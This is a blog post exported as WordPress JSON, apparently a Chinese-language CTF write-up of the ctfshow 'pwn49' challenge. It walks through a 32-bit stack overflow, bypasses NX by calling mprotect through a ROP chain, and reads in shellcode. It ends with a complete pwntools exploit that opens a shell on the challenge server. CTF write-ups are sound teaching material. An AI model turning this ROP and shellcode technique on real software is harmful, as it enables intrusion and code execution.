{"id":252,"date":"2025-02-09T13:07:11","date_gmt":"2025-02-09T05:07:11","guid":{"rendered":"https:\/\/www.okabe.xin\/?p=252"},"modified":"2025-02-09T13:07:11","modified_gmt":"2025-02-09T05:07:11","slug":"pwn49","status":"publish","type":"post","link":"https:\/\/www.okabe.xin\/wordpress\/?p=252","title":{"rendered":"pwn49"},"content":{"rendered":"\n

32\u4f4d<\/p>\n\n\n\n

NX\u5f00\u542f<\/p>\n\n\n\n

\u63d0\u793amprotect<\/p>\n\n\n\n

mprotect()\u51fd\u6570\u53ef\u4ee5\u4fee\u6539\u8c03\u7528\u8fdb\u7a0b\u5185\u5b58\u9875\u7684\u4fdd\u62a4\u5c5e\u6027<\/p>\n\n\n\n

\u6240\u4ee5\u5229\u7528mprotect\u51fd\u6570\uff0c\u5c31\u53ef\u4ee5\u7ed5\u8fc7NX<\/p>\n\n\n\n

\u4ece\u800c\u8fbe\u5230\u5199\u5165shellcode\u7684\u76ee\u7684<\/p>\n\n\n\n

int ctfshow()
{
  _BYTE v1[14]; \/\/ [esp+6h] [ebp-12h] BYREF
\u200b
  return read(0, v1, 100);
}<\/code><\/pre>\n\n\n\n
ctfshow\u51fd\u6570\u4e2d\u62ff\u5230\u504f\u79fb\u5730\u5740<\/p>\n\n\n\n
0x12+4<\/p>\n\n\n\n
mprotect\u51fd\u6570\u5b58\u5728\u4e09\u4e2a\u53c2\u6570<\/p>\n\n\n\n
\u8fd9\u4e09\u4e2a\u53c2\u6570\u5206\u522b\u4e3a\uff1a\u5185\u5b58\u533a\u57df\u8d77\u59cb\u5730\u5740<\/strong> \u5185\u5b58\u533a\u57df\u5927\u5c0f<\/strong> \u8bbf\u95ee\u6743\u9650<\/strong><\/p>\n\n\n\n
\u800c\u8bbf\u95ee\u6743\u9650\uff0c\u53c8\u6709\u4e09\u4e2a\u503c<\/p>\n\n\n\n
r:4 w:2 x:1<\/p>\n\n\n\n
\u6240\u4ee5\uff0crwx\u6743\u9650(\u53ef\u8bfb\u53ef\u5199\u53ef\u6267\u884c)\u5c31\u662f0x7<\/p>\n\n\n\n
\u60f3\u8981\u8c03\u7528mprotect\u51fd\u6570<\/p>\n\n\n\n
\u5c31\u9700\u8981\u8ba9ctfshow\u51fd\u6570\u7684\u8fd4\u56de\u5730\u5740\u4e3amprotect\u51fd\u6570\u7684\u5730\u5740<\/p>\n\n\n\n
\u901a\u8fc7gdb\u7684disass mprotect \u6307\u4ee4<\/p>\n\n\n\n
\u62ff\u5230mprotect\u7684\u5730\u5740<\/p>\n\n\n\n
pwndbg> disass mprotect
Dump of assembler code for function mprotect:
   0x0806cdd0 <+0>: push   ebx
   0x0806cdd1 <+1>: mov    edx,DWORD PTR [esp+0x10]
   0x0806cdd5 <+5>: mov    ecx,DWORD PTR [esp+0xc]
   0x0806cdd9 <+9>: mov    ebx,DWORD PTR [esp+0x8]
   0x0806cddd <+13>:    mov    eax,0x7d
   0x0806cde2 <+18>:    call   DWORD PTR gs:0x10
   0x0806cde9 <+25>:    pop    ebx
   0x0806cdea <+26>:    cmp    eax,0xfffff001
   0x0806cdef <+31>:    jae    0x8070520 <__syscall_error>
   0x0806cdf5 <+37>:    ret    
End of assembler dump.<\/code><\/pre>\n\n\n\n
\u6240\u4ee5mprotect\u51fd\u6570\u7684\u5730\u5740\u4e3a\uff1a0x0806cdd0<\/p>\n\n\n\n
mprotect\u51fd\u6570\u53ef\u4ee5\u88ab\u8c03\u7528\u4e86\uff0c\u4f46\u6211\u4eec\u8fd8\u9700\u8981\u627e\u5230\u8fd9\u4e2a\u51fd\u6570\u7684\u8fd4\u56de\u5730\u5740<\/p>\n\n\n\n
\u8fd4\u56de\u5730\u5740\u9009\u4e3aread\u51fd\u6570\u7684\u5730\u5740\uff0c\u8fd9\u6837\u80fd\u5e2e\u52a9\u5199\u5165shellcode\u5230\u5185\u5b58\u7a7a\u95f4\u91cc<\/p>\n\n\n\n
\u5bf9\u4e8emprotect\u51fd\u6570\u90e8\u5206\u7684payload\uff0c\u60c5\u51b5\u5c31\u662f<\/p>\n\n\n\n
\u586b\u5145 + mprotect\u51fd\u6570 + \u8fd4\u56de\u5730\u5740 + mprotect\u7684\u4e09\u4e2a\u53c2\u6570 + read\u51fd\u6570<\/p>\n\n\n\n
\u5728IDA\u91cc\u9762\u67e5\u627e\u5f97\u5230read\u51fd\u6570\u7684\u5730\u5740<\/p>\n\n\n\n
read 0x0806BEE0<\/p>\n\n\n\n
\u73b0\u5728\u5c31\u53ea\u8981\u8865\u9f50\u4e09\u4e2a\u53c2\u6570\u5c31\u597d\u4e86<\/p>\n\n\n\n
\u9996\u5148\u662f\u5185\u5b58\u533a\u57df\u8d77\u59cb\u5730\u5740\uff0c\u9009\u7528got\u8868\u7684\u8d77\u59cb\u5730\u5740<\/p>\n\n\n\n
\u9009\u7528got\u8868\u7684\u539f\u56e0\uff1a<\/p>\n\n\n\n
1. .got.plt \u8868\u7684\u7279\u6027<\/strong><\/h3>\n\n\n\n
    \n
  • \u5168\u5c40\u504f\u79fb\u8868\uff08GOT\uff09<\/strong> \u662f ELF\uff08Executable and Linkable Format\uff09\u6587\u4ef6\u683c\u5f0f\u4e2d\u7684\u4e00\u4e2a\u91cd\u8981\u90e8\u5206\uff0c\u7528\u4e8e\u5b58\u50a8\u52a8\u6001\u94fe\u63a5\u5e93\u4e2d\u51fd\u6570\u7684\u5730\u5740\u3002<\/li>\n\n\n\n
  • .got.plt \u8868<\/strong> \u662f GOT \u8868\u7684\u4e00\u4e2a\u5b50\u96c6\uff0c\u4e13\u95e8\u7528\u4e8e\u5b58\u50a8\u7a0b\u5e8f\u4e2d\u8c03\u7528\u7684\u52a8\u6001\u94fe\u63a5\u5e93\u51fd\u6570\u7684\u5730\u5740\u3002\u5b83\u901a\u5e38\u4f4d\u4e8e\u7a0b\u5e8f\u7684\u5185\u5b58\u7a7a\u95f4\u4e2d\uff0c\u4e14\u5728\u7a0b\u5e8f\u8fd0\u884c\u65f6\u4f1a\u88ab\u52a0\u8f7d\u5230\u5185\u5b58\u4e2d\u3002<\/li>\n<\/ul>\n\n\n\n
    2. \u4e3a\u4ec0\u4e48\u9009\u62e9 .got.plt \u8868\u7684\u8d77\u59cb\u5730\u5740<\/strong><\/h3>\n\n\n\n
      \n
    • \u5185\u5b58\u5bf9\u9f50\u548c\u6743\u9650\u4fee\u6539\u7684\u4fbf\u5229\u6027<\/strong>\uff1a\n
        \n
      • .got.plt \u8868\u7684\u8d77\u59cb\u5730\u5740\u901a\u5e38\u662f\u5185\u5b58\u9875\u7684\u8d77\u59cb\u5730\u5740\uff08\u901a\u5e38\u662f 4KB \u5bf9\u9f50\uff09\uff0c\u8fd9\u7b26\u5408 mprotect \u51fd\u6570\u7684\u8981\u6c42\uff0c\u5373\u8d77\u59cb\u5730\u5740\u5fc5\u987b\u662f\u5185\u5b58\u9875\u7684\u8d77\u59cb\u5730\u5740\u3002<\/li>\n\n\n\n
      • \u4fee\u6539 .got.plt \u8868\u7684\u6743\u9650\u53ef\u4ee5\u8986\u76d6\u6574\u4e2a\u8868\u7684\u8303\u56f4\uff0c\u800c\u4e0d\u9700\u8981\u62c5\u5fc3\u8de8\u9875\u95ee\u9898\uff0c\u56e0\u4e3a .got.plt \u8868\u901a\u5e38\u4e0d\u4f1a\u8de8\u8d8a\u591a\u4e2a\u5185\u5b58\u9875\u3002<\/li>\n<\/ul>\n<\/li>\n\n\n\n
      • \u7ed5\u8fc7 NX \u4fdd\u62a4<\/strong>\uff1a\n
          \n
        • \u5728\u73b0\u4ee3\u64cd\u4f5c\u7cfb\u7edf\u4e2d\uff0c\u6808\u548c\u5806\u901a\u5e38\u662f\u6ca1\u6709\u6267\u884c\u6743\u9650\u7684\uff08\u5373\u5f00\u542f\u4e86 NX \u4fdd\u62a4\uff09\u3002\u800c .got.plt \u8868\u4f4d\u4e8e\u7a0b\u5e8f\u7684 .got \u6bb5\u4e2d\uff0c\u8fd9\u4e2a\u6bb5\u901a\u5e38\u662f\u53ef\u4ee5\u8bfb\u5199\u7684\u3002<\/li>\n\n\n\n
        • \u901a\u8fc7\u4fee\u6539 .got.plt \u8868\u7684\u6743\u9650\uff0c\u53ef\u4ee5\u5c06\u5176\u8bbe\u7f6e\u4e3a\u53ef\u8bfb\u3001\u53ef\u5199\u3001\u53ef\u6267\u884c\uff08PROT_READ | PROT_WRITE | PROT_EXEC\uff09\uff0c\u4ece\u800c\u7ed5\u8fc7 NX \u4fdd\u62a4\uff0c\u4e3a\u6267\u884c shellcode \u63d0\u4f9b\u6761\u4ef6\u3002<\/li>\n<\/ul>\n<\/li>\n\n\n\n
        • \u907f\u514d\u5bf9\u7a0b\u5e8f\u5176\u4ed6\u90e8\u5206\u7684\u5f71\u54cd<\/strong>\uff1a\n
            \n
          • .got.plt \u8868\u901a\u5e38\u7528\u4e8e\u5b58\u50a8\u52a8\u6001\u94fe\u63a5\u5e93\u51fd\u6570\u7684\u5730\u5740\uff0c\u4fee\u6539\u5176\u6743\u9650\u4e0d\u4f1a\u76f4\u63a5\u5f71\u54cd\u7a0b\u5e8f\u7684\u5176\u4ed6\u90e8\u5206\uff08\u5982\u6808\u3001\u5806\u7b49\uff09\u3002<\/li>\n\n\n\n
          • \u76f8\u6bd4\u4e4b\u4e0b\uff0c\u4fee\u6539 .bss \u6bb5\u53ef\u80fd\u4f1a\u5bfc\u81f4\u7a0b\u5e8f\u5d29\u6e83\uff0c\u56e0\u4e3a .bss \u6bb5\u5728\u7a0b\u5e8f\u542f\u52a8\u65f6\u4f1a\u88ab\u6e05\u96f6\uff0c\u4fee\u6539\u540e\u7684\u5185\u5bb9\u53ef\u80fd\u4f1a\u88ab\u8986\u76d6\u3002<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n
            \u6240\u4ee5\u5bfb\u627egot\u8868\u5730\u5740<\/p>\n\n\n\n
            \u4f7f\u7528readelf -S pwn49<\/p>\n\n\n\n
            \u8fd9\u4e2a\u547d\u4ee4\u5c31\u80fd\u62ff\u5230\u6240\u6709\u8282\u5934\u4fe1\u606f<\/p>\n\n\n\n
            There are 31 section headers, starting at offset 0xa1474:
            \u200b
            Section Headers:
              [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
              [ 0]                   NULL            00000000 000000 000000 00      0   0  0
              [ 1] .note.ABI-tag     NOTE            080480f4 0000f4 000020 00   A  0   0  4
              [ 2] .note.gnu.build-i NOTE            08048114 000114 000024 00   A  0   0  4
            readelf: Warning: [ 3]: Link field (0) should index a symtab section.
              [ 3] .rel.plt          REL             08048138 000138 000070 08  AI  0  19  4
              [ 4] .init             PROGBITS        080481a8 0001a8 000023 00  AX  0   0  4
              [ 5] .plt              PROGBITS        080481d0 0001d0 000070 00  AX  0   0  8
              [ 6] .text             PROGBITS        08048240 000240 063421 00  AX  0   0 16
              [ 7] __libc_freeres_fn PROGBITS        080ab670 063670 000ba7 00  AX  0   0 16
              [ 8] __libc_thread_fre PROGBITS        080ac220 064220 000127 00  AX  0   0 16
              [ 9] .fini             PROGBITS        080ac348 064348 000014 00  AX  0   0  4
              [10] .rodata           PROGBITS        080ac360 064360 018b98 00   A  0   0 32
              [11] .eh_frame         PROGBITS        080c4ef8 07cef8 011e48 00   A  0   0  4
              [12] .gcc_except_table PROGBITS        080d6d40 08ed40 0000ac 00   A  0   0  1
              [13] .tdata            PROGBITS        080d86e0 08f6e0 000010 00 WAT  0   0  4
              [14] .tbss             NOBITS          080d86f0 08f6f0 000020 00 WAT  0   0  4
              [15] .init_array       INIT_ARRAY      080d86f0 08f6f0 000008 04  WA  0   0  4
              [16] .fini_array       FINI_ARRAY      080d86f8 08f6f8 000008 04  WA  0   0  4
              [17] .data.rel.ro      PROGBITS        080d8700 08f700 0018d4 00  WA  0   0 32
              [18] .got              PROGBITS        080d9fd4 090fd4 000028 00  WA  0   0  4
              [19] .got.plt          PROGBITS        080da000 091000 000044 04  WA  0   0  4
              [20] .data             PROGBITS        080da060 091060 000f20 00  WA  0   0 32
              [21] __libc_subfreeres PROGBITS        080daf80 091f80 000024 00  WA  0   0  4
              [22] __libc_IO_vtables PROGBITS        080dafc0 091fc0 000354 00  WA  0   0 32
              [23] __libc_atexit     PROGBITS        080db314 092314 000004 00  WA  0   0  4
              [24] __libc_thread_sub PROGBITS        080db318 092318 000004 00  WA  0   0  4
              [25] .bss              NOBITS          080db320 09231c 000cdc 00  WA  0   0 32
              [26] __libc_freeres_pt NOBITS          080dbffc 09231c 000014 00  WA  0   0  4
              [27] .comment          PROGBITS        00000000 09231c 000029 01  MS  0   0  1
              [28] .symtab           SYMTAB          00000000 092348 008640 10     29 1090  4
              [29] .strtab           STRTAB          00000000 09a988 006992 00      0   0  1
              [30] .shstrtab         STRTAB          00000000 0a131a 000159 00      0   0  1
            Key to Flags:
              W (write), A (alloc), X (execute), M (merge), S (strings), I (info),
              L (link order), O (extra OS processing required), G (group), T (TLS),
              C (compressed), x (unknown), o (OS specific), E (exclude),
              p (processor specific)<\/code><\/pre>\n\n\n\n
            [19] .got.plt PROGBITS 080da000 091000 000044 04 WA 0 0 4<\/p>\n\n\n\n
            \u8fd9\u91cc\u62ff\u5230got\u8868\u5730\u5740<\/p>\n\n\n\n
            0x080da000<\/p>\n\n\n\n
            \u73b0\u5728\u586b\u8865\u53e6\u5916\u4e24\u4e2a\u53c2\u6570\uff1a\u5185\u5b58\u533a\u57df\u5927\u5c0f\u548c\u6743\u9650<\/p>\n\n\n\n
            \u5927\u5c0f\u5c31\u53ef\u4ee5\u968f\u4fbf\u8bbe\u5b9a\u5c31\u597d\uff0c0x100\u5565\u7684\u5e94\u8be5\u90fd\u80fd\u968f\u4fbf\u7528\uff0c\u5927\u4e86\u6539\u5c0f\uff0c\u5c0f\u4e86\u6539\u5927\uff0c\u80fd\u5b58\u5165shellcode\u5c31\u591f\u4e86<\/p>\n\n\n\n
            \u6743\u9650\u5219\u662f0x7\u5373\u53ef<\/p>\n\n\n\n
            \u53c2\u6570\u627e\u5230\u4e86\uff0c\u8fd8\u9700\u8981\u627e\u5230\u4e09\u4e2apop\uff0c\u4e00\u4e2aret\u7684gadget<\/p>\n\n\n\n
            ctfshow@ubuntu:~\/Desktop\/xd$ ROPgadget --binary pwn49 --only \"pop|ret\" |grep \"pop\"
            0x0809f422 : pop ds ; pop ebx ; pop esi ; pop edi ; ret
            0x0809f41a : pop eax ; pop ebx ; pop esi ; pop edi ; ret
            0x08056194 : pop eax ; pop edx ; pop ebx ; ret
            0x080a8dd6 : pop eax ; ret
            0x0806a68d : pop ebp ; pop ebx ; pop esi ; pop edi ; ret
            0x0809f805 : pop ebp ; pop esi ; pop edi ; ret
            0x0804834c : pop ebp ; ret
            0x0805d6f2 : pop ebp ; ret 4
            0x080a1db7 : pop ebp ; ret 8
            0x0809f804 : pop ebx ; pop ebp ; pop esi ; pop edi ; ret
            0x0805b75e : pop ebx ; pop edi ; ret
            0x0806dfea : pop ebx ; pop edx ; ret
            0x080a019b : pop ebx ; pop esi ; pop ebp ; ret
            0x08048349 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
            0x0805d6ef : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 4
            0x080a1db4 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 8
            0x08049bd9 : pop ebx ; pop esi ; pop edi ; ret
            0x08049807 : pop ebx ; pop esi ; ret
            0x080481c9 : pop ebx ; ret
            0x080c2fdc : pop ebx ; ret 0x6f9
            0x0806e012 : pop ecx ; pop ebx ; ret
            0x0804834b : pop edi ; pop ebp ; ret
            0x0805d6f1 : pop edi ; pop ebp ; ret 4
            0x080a1db6 : pop edi ; pop ebp ; ret 8
            0x08069cbe : pop edi ; pop ebx ; ret
            0x08061c3b : pop edi ; pop esi ; pop ebx ; ret
            0x080921b8 : pop edi ; pop esi ; ret
            0x08049bdb : pop edi ; ret
            0x08056195 : pop edx ; pop ebx ; ret
            0x0806e011 : pop edx ; pop ecx ; pop ebx ; ret
            0x0806dfeb : pop edx ; ret
            0x0809f419 : pop es ; pop eax ; pop ebx ; pop esi ; pop edi ; ret
            0x08065aba : pop es ; pop edi ; ret
            0x08065cfa : pop es ; ret
            0x080a019c : pop esi ; pop ebp ; ret
            0x0806dfe9 : pop esi ; pop ebx ; pop edx ; ret
            0x08061c3c : pop esi ; pop ebx ; ret
            0x0804834a : pop esi ; pop edi ; pop ebp ; ret
            0x0805d6f0 : pop esi ; pop edi ; pop ebp ; ret 4
            0x080a1db5 : pop esi ; pop edi ; pop ebp ; ret 8
            0x08069cbd : pop esi ; pop edi ; pop ebx ; ret
            0x08049bda : pop esi ; pop edi ; ret
            0x08049808 : pop esi ; ret
            0x08054706 : pop esp ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
            0x0809e12e : pop esp ; ret
            0x0805ad28 : pop esp ; ret 0x8b38
            0x080622c9 : pop ss ; ret 0x2c73
            0x08062c8a : pop ss ; ret 0x3273
            0x080622b4 : pop ss ; ret 0x3e73
            0x08062c70 : pop ss ; ret 0x4c73
            0x0806229f : pop ss ; ret 0x5073
            0x0806228a : pop ss ; ret 0x6273
            0x08062c56 : pop ss ; ret 0x6673
            0x08060805 : pop ss ; ret 0x830f<\/code><\/pre>\n\n\n\n
            \u901a\u8fc7\u6307\u4ee4\u627e\u5230\u8fd9\u6837\u7684gadget<\/p>\n\n\n\n
            0x08056194<\/p>\n\n\n\n
            \u8fd9\u4e2agadget\u5c31\u80fd\u4f5c\u4e3amprotect\u7684\u8fd4\u56de\u5730\u5740<\/p>\n\n\n\n
            \u586b\u5145\u5730\u5740 0x12+4<\/p>\n\n\n\n
            mprotect\u51fd\u6570 0x0806cdd0<\/p>\n\n\n\n
            \u8fd4\u56de\u5730\u5740 0x08056194<\/p>\n\n\n\n
            mprotect\u7684\u4e09\u4e2a\u53c2\u6570 0x080da000 0x100 0x7<\/p>\n\n\n\n
            read\u51fd\u6570 0x0806BEE0<\/p>\n\n\n\n
            shellcode\u7531asm\u65b9\u6cd5\u751f\u6210<\/p>\n\n\n\n
            shellcode = asm(shellcraft.sh(),arch='i386',os='linux')<\/pre>\n\n\n\n
            \u7136\u540e\u662fread\u90e8\u5206\u7684payload<\/p>\n\n\n\n
            read\u51fd\u6570 + read\u51fd\u6570\u8fd4\u56de\u5730\u5740(\u5c31\u662f\u6211\u4eecshellcode\u6240\u5728\u5730\u5740-\u5373\u6211\u4eec\u4fee\u6539\u7684\u5185\u5b58\u7a7a\u95f4\u7684\u8d77\u59cb\u5730\u5740) + read\u53c2\u65701 + read\u53c2\u65702(\u5c31\u662f\u6211\u4eecshellcode\u5730\u5740) + read\u53c2\u65703(read\u8bfb\u53d6\u7684\u5927\u5c0f)<\/p>\n\n\n\n
            read\u7684\u53c2\u65701\u662f\u6587\u4ef6\u6807\u8bc6\u7b26<\/p>\n\n\n\n
            \u5373fd<\/p>\n\n\n\n
            \u5e38\u6001\u4e0b\uff0cfd=0\u5373\u53ef<\/p>\n\n\n\n
            \u6240\u4ee5read\u53c2\u65701\u51990\u5c31\u53ef<\/p>\n\n\n\n
            \u81f3\u4e8e\u53c2\u65702\u548c\u53c2\u65703\uff0cshellcode\u5199\u5728got\uff0c\u6240\u4ee5\u53c2\u65702\u4e3agot\u8868\u8d77\u59cb\u5730\u5740\uff0c\u53c2\u65703\u5c31\u5199\u5185\u5b58\u533a\u57df\u5927\u5c0f\u5373\u53ef<\/p>\n\n\n\n
            shellcode = asm(shellcraft.sh(),arch='i386',os='linux')
            payload = b'a'*(0x12+4)
            payload += p32(0x0806cdd0) # mprotect\u51fd\u6570\u5730\u5740
            payload += p32(0x08056194) # 3 pop 1 ret\u5730\u5740  
            payload += p32(0x080da000) # \u9700\u8981\u4fee\u6539\u7684\u5185\u5b58\u7684\u8d77\u59cb\u5730\u5740
            payload += p32(0x1000) # \u4fee\u6539\u5185\u5b58\u7a7a\u95f4\u7684\u5927\u5c0f
            payload += p32(0x7) # \u9700\u8981\u8d4b\u4e88\u7684\u6743\u9650
            payload += p32(0x806bee0) # read\u51fd\u6570\u5730\u5740
            payload += p32(0x080da000) # read\u51fd\u6570\u8fd4\u56de\u5730\u5740(\u5c31\u662f\u6211\u4eecshellcode\u6240\u5728\u5730\u5740,\u5373\u6211\u4eec\u4fee\u6539\u7684\u5185\u5b58\u7a7a\u95f4\u7684\u8d77\u59cb\u5730\u5740)
            payload += p32(0x0) 
            payload += p32(0x080da000) # shellcode\u5730\u5740
            payload += p32(len(shellcode))<\/code><\/pre>\n\n\n\n
            \u5b8c\u6574exp\uff1a<\/p>\n\n\n\n
            # -*- coding: UTF-8 -*-
            from pwn import *
            u=remote(\"pwn.challenge.ctf.show\",28307)
            shellcode = asm(shellcraft.sh(),arch='i386',os='linux')
            payload = b'a'*(0x12+4)
            payload += p32(0x0806cdd0) # mprotect\u51fd\u6570\u5730\u5740
            payload += p32(0x08056194) # 3 pop 1 ret\u5730\u5740
            payload += p32(0x080da000) # \u9700\u8981\u4fee\u6539\u7684\u5185\u5b58\u7684\u8d77\u59cb\u5730\u5740
            payload += p32(0x1000) # \u4fee\u6539\u5185\u5b58\u7a7a\u95f4\u7684\u5927\u5c0f
            payload += p32(0x7) # \u9700\u8981\u8d4b\u4e88\u7684\u6743\u9650
            payload += p32(0x806bee0) # read\u51fd\u6570\u5730\u5740
            payload += p32(0x080da000) # read\u51fd\u6570\u8fd4\u56de\u5730\u5740(\u5c31\u662f\u6211\u4eecshellcode\u6240\u5728\u5730\u5740,\u5373\u6211\u4eec\u4fee\u6539\u7684\u5185\u5b58\u7a7a\u95f4\u7684\u8d77\u59cb\u5730\u5740)
            payload += p32(0x0)
            payload += p32(0x080da000) # shellcode\u5730\u5740
            payload += p32(len(shellcode))
            u.sendline(payload)
            u.sendline(shellcode)
            u.interactive()<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
            32\u4f4d NX\u5f00\u542f \u63d0\u793amprotect mprotect()\u51fd\u6570\u53ef\u4ee5\u4fee\u6539\u8c03\u7528\u8fdb\u7a0b\u5185\u5b58\u9875\u7684\u4fdd\u62a4\u5c5e\u6027 \u6240\u4ee5\u5229\u7528mp […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-252","post","type-post","status-publish","format-standard","hentry","category-ctf"],"_links":{"self":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/252","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=252"}],"version-history":[{"count":0,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/252\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=252"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=252"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=252"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}